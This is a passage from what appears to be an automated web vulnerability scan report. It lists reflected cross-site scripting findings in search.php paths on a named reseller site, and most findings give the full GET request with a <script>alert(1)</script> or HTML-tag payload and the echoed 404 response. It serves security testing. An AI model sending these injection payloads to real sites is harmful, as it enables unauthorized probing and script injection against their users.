<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&be753<script>alert(1)</script>80bf349cfd4=1 was not found on this server.</p>
...[SNIP]...

2.2149. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c6e7e<a>db5d5011d00 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2c6e7e<a>db5d5011d00 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2c6e7e<a>db5d5011d00 was not found on this server.</p>
...[SNIP]...

2.2150. http://www.resellerbase.com/detail/30/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78627<script>alert(1)</script>b8b88710dc6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail78627<script>alert(1)</script>b8b88710dc6/30/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail78627<script>alert(1)</script>b8b88710dc6/30/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2151. http://www.resellerbase.com/detail/30/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a5022<script>alert(1)</script>7993d84aba1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30a5022<script>alert(1)</script>7993d84aba1/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30a5022<script>alert(1)</script>7993d84aba1/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2152. http://www.resellerbase.com/detail/30/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a5b96<script>alert(1)</script>2ea269148d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themesa5b96<script>alert(1)</script>2ea269148d2/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themesa5b96<script>alert(1)</script>2ea269148d2/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2153. http://www.resellerbase.com/detail/30/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3a029<script>alert(1)</script>c59b8ee40d9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos3a029<script>alert(1)</script>c59b8ee40d9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos3a029<script>alert(1)</script>c59b8ee40d9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2154. http://www.resellerbase.com/detail/30/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8a572<script>alert(1)</script>4637932f3b6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/search.php8a572<script>alert(1)</script>4637932f3b6?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/search.php8a572<script>alert(1)</script>4637932f3b6?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2155. http://www.resellerbase.com/detail/30/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4f3e4<a>4232cd4f0d4 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/kosmos/search.php?keyword=search...&Submit3=Search4f3e4<a>4232cd4f0d4&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/search.php?keyword=search...&Submit3=Search4f3e4<a>4232cd4f0d4&opt=2 was not found on this server.</p>
...[SNIP]...

2.2156. http://www.resellerbase.com/detail/30/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload d3ec4<a>9ed03669bdb was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/kosmos/search.php?keyword=search...d3ec4<a>9ed03669bdb&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/search.php?keyword=search...d3ec4<a>9ed03669bdb&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2157. http://www.resellerbase.com/detail/30/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f3eef<script>alert(1)</script>30c46aa1e64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&f3eef<script>alert(1)</script>30c46aa1e64=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&f3eef<script>alert(1)</script>30c46aa1e64=1 was not found on this server.</p>
...[SNIP]...

2.2158. http://www.resellerbase.com/detail/30/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 3611a<a>81afaa1cf26 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=23611a<a>81afaa1cf26 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=23611a<a>81afaa1cf26 was not found on this server.</p>
...[SNIP]...

2.2159. http://www.resellerbase.com/detail/30/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3e2cc<script>alert(1)</script>b214ea69c11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3e2cc<script>alert(1)</script>b214ea69c11/30/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3e2cc<script>alert(1)</script>b214ea69c11/30/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2160. http://www.resellerbase.com/detail/30/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 12d75<script>alert(1)</script>c1ea4fed932 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3012d75<script>alert(1)</script>c1ea4fed932/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3012d75<script>alert(1)</script>c1ea4fed932/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2161. http://www.resellerbase.com/detail/30/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a69b0<script>alert(1)</script>25e4ac4b102 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themesa69b0<script>alert(1)</script>25e4ac4b102/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themesa69b0<script>alert(1)</script>25e4ac4b102/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2162. http://www.resellerbase.com/detail/30/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b079f<script>alert(1)</script>0b85c2ddc45 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/search.phpb079f<script>alert(1)</script>0b85c2ddc45?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/search.phpb079f<script>alert(1)</script>0b85c2ddc45?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2163. http://www.resellerbase.com/detail/30/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3abdf<a>59256de340 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/search.php?keyword=search...&Submit3=Search3abdf<a>59256de340&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/search.php?keyword=search...&Submit3=Search3abdf<a>59256de340&opt=2 was not found on this server.</p>
...[SNIP]...

2.2164. http://www.resellerbase.com/detail/30/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a967d<a>c920ee11251 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/search.php?keyword=search...a967d<a>c920ee11251&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/search.php?keyword=search...a967d<a>c920ee11251&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2165. http://www.resellerbase.com/detail/30/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload de49b<script>alert(1)</script>0daf5776181 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/search.php?keyword=search...&Submit3=Search&opt=2&de49b<script>alert(1)</script>0daf5776181=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/search.php?keyword=search...&Submit3=Search&opt=2&de49b<script>alert(1)</script>0daf5776181=1 was not found on this server.</p>
...[SNIP]...

2.2166. http://www.resellerbase.com/detail/30/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 63c52<a>cc796d03327 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/themes/search.php?keyword=search...&Submit3=Search&opt=263c52<a>cc796d03327 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
